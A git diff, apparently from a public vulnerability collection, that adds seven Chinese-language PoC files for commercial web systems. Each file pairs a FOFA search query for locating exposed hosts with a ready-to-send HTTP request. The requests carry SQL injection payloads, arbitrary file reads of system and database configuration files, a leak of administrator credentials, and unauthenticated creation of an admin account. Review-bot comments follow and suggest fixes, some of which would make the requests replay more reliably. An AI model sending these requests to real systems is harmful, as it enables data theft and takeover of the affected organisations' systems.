diff --git a/JieLink+智能终端操作平台存在sql注入漏洞.md b/JieLink+智能终端操作平台存在sql注入漏洞.md new file mode 100644 index 0000000..d02d4a3 --- /dev/null +++ b/JieLink+智能终端操作平台存在sql注入漏洞.md @@ -0,0 +1,29 @@ +## JieLink+智能终端操作平台存在sql注入漏洞 + +jieLink+智能终端操作平台deviceId参数存在sql注入漏洞,攻击者利用此漏洞可导致数据库的敏感信息泄露。 + +## fofa + +``` +title="JieLink+智能终端操作平台" +``` + +## poc + +``` +POST /mobile/Remote/GetParkController HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: DefaultSystem=Mobile; ASP.NET_SessionId=533gfzuselgriachdgogkug5 +Content-Type: application/x-www-form-urlencoded +Content-Length: 66 + +deviceId=1'and/**/extractvalue(1,concat(char(126),database()))and' +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031649500.png) \ No newline at end of file diff --git a/README.md b/README.md index 5a48977..f0909a1 100644 --- a/README.md +++ b/README.md @@ -15,6 +15,13 @@ - 英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞 - GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401) - D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853) +- 致远OA-A8-V5接口officeservlet存在任意文件读取漏洞 +- JieLink+智能终端操作平台存在sql注入漏洞 +- 金斗云-HKMP智慧商业软件任意用户添加漏洞 +- 热网无线监测系统SystemManager.asmx存在SQL注入漏洞 +- 喰星云-数字化餐饮服务系统listuser信息泄露漏洞 +- 邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞 +- 锐明技术Crocus系统Service.do任意文件读取漏洞 ## 2024.06.28 新增漏洞 diff --git a/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md b/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md new file mode 100644 index 0000000..ba04d7e --- /dev/null +++ b/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md 
@@ -0,0 +1,22 @@ +## 喰星云-数字化餐饮服务系统listuser信息泄露漏洞 + +喰星云·数字化餐饮服务系统 listuser 接口处存在信息泄露漏洞,未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息,导致后台权限被控,造成信息泄露,使系统处于极不安全的状态。 + +## fofa + +``` +body="tmp_md5_pwd" +``` + +## poc + +``` +GET /chainsales/head/user/listuser HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031710747.png) \ No newline at end of file diff --git a/热网无线监测系统SystemManager.asmx存在SQL注入漏洞.md b/热网无线监测系统SystemManager.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..b1ec5da --- /dev/null +++ b/热网无线监测系统SystemManager.asmx存在SQL注入漏洞.md @@ -0,0 +1,26 @@ +## 热网无线监测系统SystemManager.asmx存在SQL注入漏洞 + +热网无线监测系统 SystemManager.asmx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +``` +body="Downloads/HDPrintInstall.rar" || body="skins/login/images/btn_login.jpg" +``` + +## poc + +``` +POST /DataSrvs/SystemManager.asmx/UpdateWUT HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +Content-Type: application/x-www-form-urlencoded +Connection: close + +id=%28SELECT+CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28CASE+WHEN+%281675%3D1675%29+THEN+@@version+ELSE+CHAR%2848%29+END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28113%29%29&name=&desc= +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031708136.png) \ No newline at end of file diff --git a/致远OA-A8-V5接口officeservlet存在任意文件读取漏洞.md b/致远OA-A8-V5接口officeservlet存在任意文件读取漏洞.md new file mode 100644 index 0000000..71db7c9 --- /dev/null 
+++ b/致远OA-A8-V5接口officeservlet存在任意文件读取漏洞.md @@ -0,0 +1,49 @@ +## 致远OA-A8-V5接口officeservlet存在任意文件读取漏洞 + +## fofa + +``` +app="致远互联-OA" && product="致远A8" +``` + +## poc + +读取`./../../base/conf/datasourceCtp.properties`路径下的数据库配置文件 + +```yaml +POST /seeyon/officeservlet HTTP/1.1 +Host: xxxx +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL= +x-forwarded-for: 127.0.0.1 +x-originating-ip: 127.0.0.1 +x-remote-ip: 127.0.0.1 +x-remote-addr: 127.0.0.1 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 350 + +DBSTEP V3.0 285 0 0 +RECORDID=wLoi +CREATEDATE=wLehP4whzUoiw=66 +originalFileId=wLoi +needReadFile=yRWZdAS6 +originalCreateDate=wLehP4whzUoiw=66 +OPTION=LKDxOWOWLlxwVlOW +TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli +COMMAND=BSTLOlMSOCQwOV66 +affairMemberId=wLoi +affairMemberName=wLoi +``` + +![image-20230426151343095](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407030924382.png) + +使用工具解密 `https://github.com/wafinfo/DecryptTools` + +![image-20240703092430361](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407030924444.png) \ No newline at end of file diff --git a/邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞.md b/邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..f1451c2 --- /dev/null +++ b/邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞.md 
@@ -0,0 +1,25 @@ +## 邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞 + +邦永PM2项目管理系统/Global/Global_UserLogin.aspx存在SQL注入漏洞,导致数据泄露。 + +## fofa + +``` +body="PM2项目管理系统BS版增强工具.zip" +``` + +## poc + +``` +GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode=&password=&type= HTTP/1.1 +Host: your-ip +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031715215.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031715529.png) \ No newline at end of file diff --git a/金斗云-HKMP智慧商业软件任意用户添加漏洞.md b/金斗云-HKMP智慧商业软件任意用户添加漏洞.md new file mode 100644 index 0000000..50da4ba --- /dev/null +++ b/金斗云-HKMP智慧商业软件任意用户添加漏洞.md @@ -0,0 +1,22 @@ +## 金斗云-HKMP智慧商业软件任意用户添加漏洞 + +金斗云 HKMP智慧商业软件 /admin/user/add 接口存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。 + +## fofa + +``` +body="金斗云 HKMP" +``` + +## poc + +``` +POST /admin/user/add HTTP/1.1 +Content-Type: application/json +Host: + +{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067, +"nonce":2287791269,"sign":"hkmp","data":{"userCode":"te1","userName":"te1","password":"123456","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}} +``` + +![image-20240703170217938](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031702984.png) \ No newline at end of file diff --git a/锐明技术Crocus系统Service.do任意文件读取漏洞.md b/锐明技术Crocus系统Service.do任意文件读取漏洞.md new file mode 100644 index 0000000..9c62caa --- /dev/null +++ b/锐明技术Crocus系统Service.do任意文件读取漏洞.md 
@@ -0,0 +1,25 @@ +## 锐明技术Crocus系统Service.do任意文件读取漏洞 + +锐明技术Crocus系统 Service.do接口存在任意文件读取漏洞,未经过身份验证的远程攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +``` +body="/ThirdResource/respond/respond.min.js" && title="Crocus" +``` + +## poc + +``` +GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031718375.png) \ No newline at end of file
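Review bot: In the JieLink+ hunk, the `Cookie: DefaultSystem=Mobile; ASP.NET_SessionId=533gfzuselgriachdgogkug5` line carries what looks like a real captured session identifier and the `Host:` header is left empty; replace the session value with a placeholder such as `ASP.NET_SessionId=xxx` and the host with `your-ip` as the other new files do. The description should also state the affected version range and whether the vendor has a fix, since the only remediation hint a reader gets is the screenshot.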
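Review bot: In the README hunk the new entry `- JieLink+智能终端操作平台存在sql注入漏洞` spells "sql" in lower case while the neighbouring entries (`热网无线监测系统SystemManager.asmx存在SQL注入漏洞`, `邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞`) use "SQL"; keep one spelling, and because the entry must match the new file name, rename both together.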
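Review bot: The 喰星云 hunk claims the `listuser` response exposes administrator login credentials but documents no affected version, no mitigation, and no indicator a defender could alert on; add at least the request path and the unauthenticated access pattern as a detection hint (a GET to `/chainsales/head/user/listuser` without a session) and note that the fofa fingerprint `body="tmp_md5_pwd"` also signals that password material is rendered into the page, which is itself worth recording as a finding.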
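Review bot: In the 热网 hunk the POST to `/DataSrvs/SystemManager.asmx/UpdateWUT` has a body (`id=...&name=&desc=`) but no `Content-Length` header, so a conforming HTTP/1.1 server will treat the request as having no body; either add the header or state that the request is meant to be replayed from a tool that recomputes it. The description's claim that the bug can be escalated to writing a webshell is not supported by anything in the hunk (the payload only reflects `@@version`), so either drop it or mark it as unverified.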
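Review bot: The 致远 hunk declares `Content-Length: 350` for a body that is well short of 350 bytes, so a server reading the declared length will hang waiting for the rest; recompute or remove the header. The fence is tagged `yaml` for an HTTP request (the other six files use an untagged fence), the `Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E` value should be a placeholder, and this is the only new file with no description paragraph under the title; add one stating the impact (database credentials in `datasourceCtp.properties`) and the affected version.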
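Review bot: The 邦永 hunk's PoC is a time-based check (`WAITFOR DELAY '0:0:5'`), so the two screenshots only prove a delayed response, not the "数据泄露" the description asserts; state the verification criterion explicitly (response time of roughly five seconds versus a baseline request) and describe the impact as "boolean/time-based SQL injection in the `accId` parameter" unless data extraction is actually shown.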
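Review bot: The 金斗云 hunk's PoC is not a read-only check: it persists a new privileged account (`userCode` `te1`, password `123456`) on the target, and the JSON body is split across two lines inside the fence, which breaks copy-and-paste. Join the body onto one line, add `Host: your-ip` and a `Content-Length`, and add a sentence that any account created during verification must be removed afterwards and that audit logs for `/admin/user/add` calls without an authenticated session are the detection signal.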
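Review bot: In the 锐明 hunk the description repeats itself ("读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等"); trim to a single mention. The GET request carries a `Content-Type: application/x-www-form-urlencoded; charset=UTF-8` header with no body, which is harmless but misleading, and the `Path=C:/windows/win.ini` probe implies a Windows host, so the affected platform and version should be stated.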